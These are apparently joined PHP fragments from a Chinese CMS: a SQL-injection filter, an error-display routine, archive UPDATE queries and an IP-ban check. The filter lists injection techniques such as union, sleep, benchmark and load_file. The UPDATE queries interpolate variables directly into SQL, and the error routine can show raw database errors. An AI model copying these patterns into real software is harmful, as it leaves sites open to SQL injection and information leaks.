($dsql->ExecuteNoneQuery($inQuery)) { $mid = $dsql->GetLastID(); //写入默认会员详细资料 if ($mtype == '个人') { $space = 'person'; } else { if ($mtype == '企业') { $space = 'company'; } else {
function CheckSql($db_string, $querytype = 'select') { global $cfg_cookie_encode; $clean = ''; $error = ''; $old_pos = 0; $pos = -1; $log_file = DEDEINC . '/../data/' . md5($cfg_cookie_encode) . '_safe.txt'; $userIP = GetIP(); $getUrl = GetCurUrl(); //如果是普通查询语句,直接过滤一些特殊语法 if ($querytype == 'select') { $notallow1 = "[^0-9a-z@\\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\\.-]{1,}"; //$notallow2 = "--|/\*"; if (preg_match("/" . $notallow1 . "/i", $db_string)) { fputs(fopen($log_file, 'a+'), "{$userIP}||{$getUrl}||{$db_string}||SelectBreak\r\n"); exit("<font size='5' color='red'>Safe Alert: Request Error step 1 !</font>"); } } //完整的SQL检查 while (TRUE) { $pos = strpos($db_string, '\'', $pos + 1); if ($pos === FALSE) { break; } $clean .= substr($db_string, $old_pos, $pos - $old_pos); while (TRUE) { $pos1 = strpos($db_string, '\'', $pos + 1); $pos2 = strpos($db_string, '\\', $pos + 1); if ($pos1 === FALSE) { break; } elseif ($pos2 == FALSE || $pos2 > $pos1) { $pos = $pos1; break; } $pos = $pos2 + 1; } $clean .= '$s$'; $old_pos = $pos + 1; } $clean .= substr($db_string, $old_pos); $clean = trim(strtolower(preg_replace(array('~\\s+~s'), array(' '), $clean))); if (strpos($clean, '@') !== FALSE or strpos($clean, 'char(') !== FALSE or strpos($clean, '"') !== FALSE or strpos($clean, '$s$$s$') !== FALSE) { $fail = TRUE; if (preg_match("#^create table#i", $clean)) { $fail = FALSE; } $error = "unusual character"; } //老版本的Mysql并不支持union,常用的程序里也不使用union,但是一些黑客使用它,所以检查它 if (strpos($clean, 'union') !== FALSE && preg_match('~(^|[^a-z])union($|[^[a-z])~is', $clean) != 0) { $fail = TRUE; $error = "union detect"; } elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== FALSE || strpos($clean, '#') !== FALSE) { $fail = TRUE; $error = "comment detect"; } elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~is', $clean) != 0) { $fail = TRUE; $error = "slown down detect"; } elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~is', $clean) != 0) { $fail = TRUE; $error = "slown down detect"; } elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~is', $clean) != 0) { $fail = TRUE; $error = "file fun detect"; } elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\\s+outfile($|[^[a-z])~is', $clean) != 0) { $fail = TRUE; $error = "file fun detect"; } elseif (preg_match('~\\([^)]*?select~is', $clean) != 0) { $fail = TRUE; $error = "sub select detect"; } if (!empty($fail)) { fputs(fopen($log_file, 'a+'), "{$userIP}||{$getUrl}||{$db_string}||{$error}\r\n"); exit("<font size='5' color='red'>Safe Alert: Request Error step 2!</font>"); } else { return $db_string; } }
function DisplayError($msg, $t = 0) { global $cfg_diserror; //向浏览器输出错误 switch ($t) { case 0: $title = '安全警告:MySql Error!'; break; case 1: $title = '安全警告:请检查您的SQL语句是否合法,您的操作将被强制停止!'; break; default: } $str = '<div style="font-family:\'微软雅黑\';font-size:12px;">'; $str .= '<h3 style="margin:0;padding:0;line-height:30px;color:red;">' . $title . '</h3>'; $str .= '<strong>错误文件</strong>:' . GetCurUrl() . '<br />'; $str .= '<strong>错误信息</strong>:' . $msg . ''; $str .= '</div>'; //判断是否输出错误提示 if ($cfg_diserror == 'Y') { echo $str; } //保存MySql错误日志 $userIP = GetIP(); $getUrl = GetCurUrl(); $getTime = GetDateTime(time()); $logfile = dirname(__FILE__) . '/../data/error/mysql_error_trace.php'; $savemsg = '<?php exit(); ?> Time: ' . $getTime . '. || Page: ' . $getUrl . ' || IP: ' . $userIP . ' || Error: ' . $msg . "\r\n"; Writef($logfile, $savemsg, 'a+'); //危险错误,强制停止 if ($t == 1) { exit; } }
$flag = $flag == '' ? 'j' : $flag . ',j'; } //跳转网址的文档强制为动态 if (preg_match("#j#", $flag)) { $ismake = -1; } //更新数据库的SQL语句 $query = "UPDATE #@__archives SET\r\n typeid='{$typeid}',\r\n typeid2='{$typeid2}',\r\n sortrank='{$sortrank}',\r\n flag='{$flag}',\r\n click='{$click}',\r\n ismake='{$ismake}',\r\n arcrank='{$arcrank}',\r\n money='{$money}',\r\n title='{$title}',\r\n color='{$color}',\r\n writer='{$writer}',\r\n source='{$source}',\r\n litpic='{$litpic}',\r\n pubdate='{$pubdate}',\r\n voteid='{$voteid}',\r\n notpost='{$notpost}',\r\n description='{$description}',\r\n keywords='{$keywords}',\r\n shorttitle='{$shorttitle}',\r\n filename='{$filename}',\r\n dutyadmin='{$adminid}',\r\n weight='{$weight}'\r\n WHERE id='{$id}'; "; if (!$dsql->ExecuteNoneQuery($query)) { ShowMsg('更新数据库archives表时出错,请检查', -1); exit; } $cts = $dsql->GetOne("SELECT addtable FROM `#@__channeltype` WHERE id='{$channelid}' "); $addtable = trim($cts['addtable']); if ($addtable != '') { $useip = GetIP(); $templet = empty($templet) ? '' : $templet; $iquery = "UPDATE `{$addtable}` SET typeid='{$typeid}',body='{$body}'{$inadd_f},redirecturl='{$redirecturl}',templet='{$templet}',userip='{$useip}' WHERE aid='{$id}'"; if (!$dsql->ExecuteNoneQuery($iquery)) { ShowMsg("更新附加表 `{$addtable}` 时出错,请检查原因!", "javascript:;"); exit; } } //生成HTML UpIndexKey($id, $arcrank, $typeid, $sortrank, $tags); if ($cfg_remote_site == 'Y' && $isremote == "1") { if ($serviterm != "") { list($servurl, $servuser, $servpwd) = explode(',', $serviterm); $config = array('hostname' => $servurl, 'username' => $servuser, 'password' => $servpwd, 'debug' => 'TRUE'); } else { $config = array();
<?php //ip禁止 defined('WEB_IN') or die('Restricted access'); $fileName = WEB_DATA . 'forbiddenip.txt'; $data = file_get_contents($fileName); $datas = explode("\r\n", $data); $remote_ip = GetIP(); if (in_array($remote_ip, $datas)) { echo 'sorry,forbidden!'; exit; } unset($fileName, $data, $datas, $remote_ip); //print_r($member_customList);